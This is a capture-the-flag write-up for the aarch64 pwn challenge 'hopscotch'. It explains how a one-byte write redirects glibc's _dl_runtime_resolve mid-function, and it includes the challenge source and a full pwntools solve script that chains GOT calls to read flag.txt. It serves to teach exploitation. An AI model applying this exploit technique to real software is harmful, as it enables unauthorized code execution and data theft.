hopscotch
12/03/2023
By: unvariant
Tags: pwn NBCTF-2023
Problem Description:
Hints:
Reveal Hints
maybe you should take a closer look at how functions are resolved...
The source for the challenge is fairly simple:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <stdint.h>
/* Size in bytes of the stack buffer `buf` in main(); also the byte count passed to every read() call there. */
#define BUFSZ 0x4000
/* Counts entries into main(): main() executes `udf #0` if this is already > 0 when it starts. */
int bad_pwner_returning_to_main = 0;
/*
 * filler - a run of nop instructions emitted into the ".plt" section.
 *
 * The section attribute places this function in ".plt". Its body assembles
 * 0x10000 / 4 `nop` instructions followed by a single `udf #0`.
 * NOTE(review): presumably this pads .plt by 0x10000 bytes (assuming 4-byte
 * instructions) to change where later code/data lands -- confirm the intent.
 */
__attribute__((section(".plt"), leaf))
void filler() {
asm volatile(
/* Assembler-level repeat: emit `nop` 0x10000 / 4 times. */
".rept 0x10000 / 4\n"
"nop\n"
".endr\n"
/* Undefined instruction placed directly after the nop run. */
"udf #0\n"
);
}
/*
 * main - challenge entry point.
 *
 * 1. Refuses to run a second time (executes `udf #0` if re-entered).
 * 2. Prints every line of /proc/self/maps that contains the substring "run".
 * 3. Reads three inputs from stdin (fd 0), each into the same stack buffer:
 *    an exit status (hex), a target address (hex), and a character.
 * 4. Writes the first byte of the third input to the target address.
 * 5. Prints the exit status with printf() and calls exit(status).
 *
 * Parameters argc/argv are unused. Return values of open()/read() are not
 * checked, and fd is never closed.
 */
int main(int argc, char **argv) {
char *address, *old, *new;
int fd;
int status;
char buf[BUFSZ];
/* Guard against returning into main(): trap on any entry after the first. */
if (bad_pwner_returning_to_main > 0) {
asm volatile("udf #0");
}
bad_pwner_returning_to_main++;
/* Disable stdio buffering on stdout and stdin. */
setbuf(stdout, NULL);
setbuf(stdin, NULL);
/* Load up to BUFSZ bytes of the process memory map into buf. */
fd = open("/proc/self/maps", O_RDONLY);
/* NOTE(review): buf is an uninitialized local and read() does not
   NUL-terminate it; the strchr()/strstr() scan below relies on whatever
   byte follows the data that was read. */
read(fd, buf, BUFSZ);
/* Walk buf one '\n'-terminated line at a time, cutting each line in place. */
old = buf;
while ((new = strchr(old, '\n'))) {
*new = 0;
/* Only echo lines that mention "run". */
if (strstr(old, "run")) {
puts(old);
}
old = new + 1;
}
/* Input 1: exit status, parsed as base-16. */
puts("exit status >");
read(0, buf, BUFSZ);
status = strtol(buf, NULL, 16);
/* Input 2: destination address, parsed as base-16 and used as a raw pointer. */
puts("address >");
read(0, buf, BUFSZ);
address = (char *)strtol(buf, NULL, 16);
/* Input 3: up to BUFSZ bytes land in buf, but only buf[0] is written out. */
puts("character >");
read(0, buf, BUFSZ);
/* The single-byte write to the user-chosen address. */
*address = buf[0];
/* printf() and exit() are the only library calls made after the write. */
printf("exiting with status: %d\n", status);
exit(status);
}
Buffering is disabled, and the program leaks the address of the binary via /proc/self/maps. Also, as the challenge description alludes to, it allows a single-byte write to an address of the user's choice. There is no buffer overflow or other vulnerability: just a leak, a one-byte write, and stack control.
For this challenge I wanted to attack the _dl_runtime_resolve function that the dynamic linker uses to resolve GOT entries at runtime. If the binary is built with Partial RELRO or No RELRO, a function pointer to _dl_runtime_resolve is present in the binary. However, it is only writable with No RELRO.
First, let's take a look at the function resolution chain:
When printf is called, it first calls the corresponding PLT entry for that function, which looks it up in the GOT and branches to it.
If the function has not been resolved yet the GOT table will point to this function:
It saves the return address (x30) and the pointer to the GOT entry (x16) on the stack, then loads x16 with the address of PLTGOT[2] (the link_map pointer sits in the slot just below it, at PLTGOT[1]) and branches to _dl_runtime_resolve.
The source for the aarch64 _dl_runtime_resolve is located at sysdeps/aarch64/dl-trampoline.S in the glibc source:
/*
 * _dl_runtime_resolve -- lazy-binding trampoline (AArch64).
 *
 * Saves x0-x9 and q0-q7 in a frame of (80+8*16) bytes, calls _dl_fixup with
 *   x0 = the word loaded from [ip0 - PTR_SIZE]
 *   x1 = a value derived from the &PLTGOT[n] the caller left on the stack,
 * then reloads the saved registers, pops the caller's two stack words into
 * ip1 and lr, and branches to the address _dl_fixup returned.
 *
 * Frame layout after the first stp (offsets from sp):
 *   0            x8, x9
 *   16           x6, x7
 *   32           x4, x5
 *   48           x2, x3
 *   64           x0, x1
 *   80           q0 .. q7 (16 bytes each)
 *   80+8*16      &PLTGOT[n]   (already on the stack at entry)
 *   80+8*16+8    lr           (already on the stack at entry)
 */
.text
.globl _dl_runtime_resolve
.type _dl_runtime_resolve, #function
cfi_startproc
.align 2
_dl_runtime_resolve:
BTI_C
/* AArch64 we get called with:
ip0 &PLTGOT[2]
ip1 temp(dl resolver entry point)
[sp, #8] lr
[sp, #0] &PLTGOT[n]
*/
cfi_rel_offset (lr, 8)
/* Note: Saving x9 is not required by the ABI but the assembler requires
the immediate values of operand 3 to be a multiple of 16 */
/* Pre-index store: allocates the whole save frame and stores x8/x9 at its base. */
stp x8, x9, [sp, #-(80+8*16)]!
cfi_adjust_cfa_offset (80+8*16)
cfi_rel_offset (x8, 0)
cfi_rel_offset (x9, 8)
stp x6, x7, [sp, #16]
cfi_rel_offset (x6, 16)
cfi_rel_offset (x7, 24)
stp x4, x5, [sp, #32]
cfi_rel_offset (x4, 32)
cfi_rel_offset (x5, 40)
stp x2, x3, [sp, #48]
cfi_rel_offset (x2, 48)
cfi_rel_offset (x3, 56)
stp x0, x1, [sp, #64]
cfi_rel_offset (x0, 64)
cfi_rel_offset (x1, 72)
stp q0, q1, [sp, #(80+0*16)]
cfi_rel_offset (q0, 80+0*16)
cfi_rel_offset (q1, 80+1*16)
/* NOTE(review): the CFI notes for the three stores below name q0/q1 again
   instead of q2..q7. The stp instructions themselves use the intended
   registers, so only unwind info is affected -- looks like a copy-paste
   slip; confirm against upstream before changing. */
stp q2, q3, [sp, #(80+2*16)]
cfi_rel_offset (q0, 80+2*16)
cfi_rel_offset (q1, 80+3*16)
stp q4, q5, [sp, #(80+4*16)]
cfi_rel_offset (q0, 80+4*16)
cfi_rel_offset (q1, 80+5*16)
stp q6, q7, [sp, #(80+6*16)]
cfi_rel_offset (q0, 80+6*16)
cfi_rel_offset (q1, 80+7*16)
/* Get pointer to linker struct. */
/* With ip0 = &PLTGOT[2], this reads the slot immediately below it. */
ldr PTR_REG (0), [ip0, #-PTR_SIZE]
/* Prepare to call _dl_fixup(). */
/* Net effect of the next six instructions:
   x1 = 3 * (&PLTGOT[n] - ip0) - RELA_SIZE
   (the value is scaled up by 8 for the subtraction, then shifted back). */
ldr x1, [sp, 80+8*16] /* Recover &PLTGOT[n] */
sub x1, x1, ip0
add x1, x1, x1, lsl #1
lsl x1, x1, #3
sub x1, x1, #(RELA_SIZE<<3)
lsr x1, x1, #3
/* Call fixup routine. */
bl _dl_fixup
/* Save the return. */
mov ip0, x0
/* Get arguments and return address back. */
ldp q0, q1, [sp, #(80+0*16)]
ldp q2, q3, [sp, #(80+2*16)]
ldp q4, q5, [sp, #(80+4*16)]
ldp q6, q7, [sp, #(80+6*16)]
ldp x0, x1, [sp, #64]
ldp x2, x3, [sp, #48]
ldp x4, x5, [sp, #32]
ldp x6, x7, [sp, #16]
/* Post-index load: reloads x8/x9 and releases the whole save frame. */
ldp x8, x9, [sp], #(80+8*16)
cfi_adjust_cfa_offset (-(80+8*16))
/* Pop the two words that were on the stack at entry: [sp] -> ip1, [sp, #8] -> lr. */
ldp ip1, lr, [sp], #16
cfi_adjust_cfa_offset (-16)
/* Jump to the newly found address. */
br ip0
cfi_endproc
.size _dl_runtime_resolve, .-_dl_runtime_resolve
The resolver saves all the argument registers, loads link_map from the GOT slot just below the address held in x16, derives the relocation offset from the &PLTGOT[n] value saved on the stack, and calls _dl_fixup to locate the real address of the function. Afterwards it restores all the registers and branches to the resolved function.
Since we have a single-byte arbitrary write in the binary, we can modify the least significant byte (LSB) of the _dl_runtime_resolve pointer and jump into the middle of the function instead of the start. This gives us control inside the function: if we skip the prologue where it saves the registers, we control the GOT index and the values of all the registers it restores from the stack, since we control whatever is on the stack from the previous reads. We control the function it resolves, all of the function's arguments, and the return address of the function, which allows us to call any function from the GOT with full argument control.
For example if we set the lsb so it starts here:
/* Excerpt of _dl_runtime_resolve: sets up the two _dl_fixup arguments.
   x0 is loaded from [ip0 - PTR_SIZE]; x1 works out to
   3 * (word at [sp, 80+8*16] - ip0) - RELA_SIZE. */
/* Get pointer to linker struct. */
ldr PTR_REG (0), [ip0, #-PTR_SIZE]
/* Prepare to call _dl_fixup(). */
ldr x1, [sp, 80+8*16] /* Recover &PLTGOT[n] */
sub x1, x1, ip0
add x1, x1, x1, lsl #1
lsl x1, x1, #3
sub x1, x1, #(RELA_SIZE<<3)
lsr x1, x1, #3
_dl_runtime_resolve will load link_map via x16 and the GOT index from the stack. We control the GOT index, so we can redirect it to any function in the GOT.
/* Excerpt of _dl_runtime_resolve: call _dl_fixup, keep its result in ip0,
   reload q0-q7 and x0-x9 from the frame at sp, pop ip1/lr, and branch to
   the returned address. */
/* Call fixup routine. */
bl _dl_fixup
/* Save the return. */
mov ip0, x0
/* Get arguments and return address back. */
ldp q0, q1, [sp, #(80+0*16)]
ldp q2, q3, [sp, #(80+2*16)]
ldp q4, q5, [sp, #(80+4*16)]
ldp q6, q7, [sp, #(80+6*16)]
ldp x0, x1, [sp, #64]
ldp x2, x3, [sp, #48]
ldp x4, x5, [sp, #32]
ldp x6, x7, [sp, #16]
/* Post-index load: also advances sp past the (80+8*16)-byte frame. */
ldp x8, x9, [sp], #(80+8*16)
cfi_adjust_cfa_offset (-(80+8*16))
/* The next two stack words become ip1 and lr (the return address). */
ldp ip1, lr, [sp], #16
cfi_adjust_cfa_offset (-16)
/* Jump to the newly found address. */
br ip0
_dl_fixup is called to resolve the function, and the returned address is stashed in x16. All the clobbered registers are restored from the stack along with the return address, and the resolved function is called. We set the return address to the PLT resolver stub again, so when the resolved function returns we can trigger this again to call another arbitrary function from the GOT.
The GOT for this challenge holds open, read, and puts, so we can leverage them to open flag.txt, read it, and print it. If only read is available this attack still works; you just have to set up the proper ret2dlresolve structures in the .bss section first so you can call arbitrary libc functions.
small red herring
Some competitors were looking at this specific part of the resolver:
/* Excerpt of _dl_runtime_resolve beginning just after `bl _dl_fixup`:
   whatever x0 holds on entry here is copied to ip0 and becomes the final
   branch target; x0-x9, q0-q7, ip1 and lr are then reloaded from the stack. */
/* Save the return. */
mov ip0, x0
/* Get arguments and return address back. */
ldp q0, q1, [sp, #(80+0*16)]
ldp q2, q3, [sp, #(80+2*16)]
ldp q4, q5, [sp, #(80+4*16)]
ldp q6, q7, [sp, #(80+6*16)]
ldp x0, x1, [sp, #64]
ldp x2, x3, [sp, #48]
ldp x4, x5, [sp, #32]
ldp x6, x7, [sp, #16]
ldp x8, x9, [sp], #(80+8*16)
cfi_adjust_cfa_offset (-(80+8*16))
ldp ip1, lr, [sp], #16
cfi_adjust_cfa_offset (-16)
/* Jump to the newly found address. */
br ip0
If you control x0 you can call an arbitrary function with full argument control, as long as you know its address beforehand. The one function in the challenge where you do have control over x0 is exit, but it's not exploitable for two reasons. First, exit accepts a 32-bit int and the binary is always mapped somewhere above the 32-bit address space. Second, there is an unresolved printf call before the exit where x0 is not controlled, which would crash the program before reaching exit.
full solve script
from pwn import *
from time import sleep
# --- pwntools configuration -------------------------------------------------
context.clear(arch="arm64")
context.terminal = ["kitty"]

file = ELF("./runner")

# When run with GDB set, pass QEMU_GDB=1337 to the emulator.
# NOTE(review): presumably this makes qemu-user wait for a debugger on that port.
env = {"QEMU_GDB": "1337"} if args.GDB else {}

# --- connect to the target (remote if HOST and PORT are given, else local qemu)
# NOTE(review): the local command runs "./run" while the ELF above is loaded
# from "./runner" -- confirm both paths refer to the same binary.
if args.HOST and args.PORT:
    p = remote(args.HOST, args.PORT)
else:
    qemu_cmd = ["qemu-aarch64", "-strace", "-D", "qemu.log", "-singlestep", "./run"]
    p = process(qemu_cmd, env=env)

# --- leak: the first line received is expected to be a /proc/self/maps entry,
# whose text before the first "-" is a hex start address.
maps_line = p.recvline().decode()
filebase = int(maps_line.partition("-")[0], 16)

# File-relative addresses of the pieces used by the exploit.
got_plt = file.get_section_by_name(".got.plt")
resolver = got_plt.header.sh_addr + 0x10      # .got.plt slot that gets its low byte patched
overwrite = 0xac                              # replacement low byte for that slot
plt = file.get_section_by_name(".plt")
trampoline = plt.header.sh_addr + 4           # used as the return address in every fake frame

log.info(f"filebase @ {filebase:#x}")
log.info(f"resolver @ {resolver:#x}")

# Prompt 1 ("exit status >"): any value works, send 0.
p.sendlineafter(b">", b"0")
# Prompt 2 ("address >"): runtime address of the slot to patch, in hex.
patch_target = filebase + resolver
p.sendlineafter(b">", f"{patch_target:#x}".encode())
def call(func: str, *args):
    """Build one fake resolver frame that makes the hijacked resolver call ``func``.

    The frame mirrors the stack layout the resolver restores from:

    * ``0x40``/``0x48`` -> x0/x1, ``0x30``/``0x38`` -> x2/x3,
      ``0x20``/``0x28`` -> x4/x5, ``0x10``/``0x18`` -> x6/x7
      (the ``ldp xN, xN+1, [sp, #off]`` reloads),
    * ``0xd0`` -> the GOT entry address the resolver reads from
      ``[sp, 80+8*16]`` to pick the function,
    * ``0xd8`` -> the value popped into ``lr``; it points back at the PLT
      stub so the next frame is consumed when ``func`` returns.

    The packed frame is 0xe0 bytes long, which equals the total amount the
    resolver advances ``sp``, so frames can be concatenated back to back.

    Args:
        func: Name of a symbol present in ``file.got``.
        *args: Up to 8 integer arguments, placed in x0..x7 in order.

    Returns:
        The packed frame as produced by ``fit``.

    Raises:
        ValueError: If more than 8 arguments are given. A 9th/10th argument
            would land in the x8/x9 slots (not argument registers) and any
            further one would need a negative frame offset.
    """
    max_reg_args = 8  # only x0..x7 have slots in the restored frame
    if len(args) > max_reg_args:
        raise ValueError(
            f"call() supports at most {max_reg_args} register arguments, got {len(args)}"
        )

    frame: dict[int, int] = {
        0xd0: filebase + file.got[func],
        0xd8: filebase + trampoline,
    }
    for index, value in enumerate(args):
        # Register pairs are stored at descending offsets: (x0,x1) at 0x40,
        # (x2,x3) at 0x30, ...; the odd register of a pair sits 8 bytes higher.
        pair_base = 0x40 - (index // 2) * 0x10
        frame[pair_base + (index % 2) * 8] = value
    return fit(frame)
# The leading frame below routes through printf first. It is not strictly
# needed (the chain could go straight to read), but the offsets were never
# recalculated without it.
# Byte 0 of the payload is the character the target writes to the chosen
# address; everything after it only matters as stack contents.
first_stage = fit({
    0x00: overwrite,
    0x08: filebase + file.got.printf,
    0x98: filebase + file.got.printf,
    0xa0: filebase + trampoline,
})

# Chained calls, one fake frame each, executed in list order:
#   read(0, bss, 0x100)  - receive the file name on stdin
#   open(bss, 0)         - open it
#   read(4, bss, 0x100)  - NOTE(review): assumes open() returned fd 4
#   puts(bss)            - print what was read
#   exit(13)
chain = [
    call("read", 0, filebase + file.bss(), 0x100),
    call("open", filebase + file.bss(), 0),
    call("read", 4, filebase + file.bss(), 0x100),
    call("puts", filebase + file.bss()),
    call("exit", 13),
]
payload = first_stage + b"".join(chain)

# Prompt 3 ("character >"): deliver the patch byte plus the frame chain.
p.sendlineafter(b">", payload)

# NOTE(review): the pause presumably keeps the file name from being consumed
# by the same read() that takes the payload -- confirm.
sleep(1)
p.sendline(b"flag.txt\x00")

p.interactive()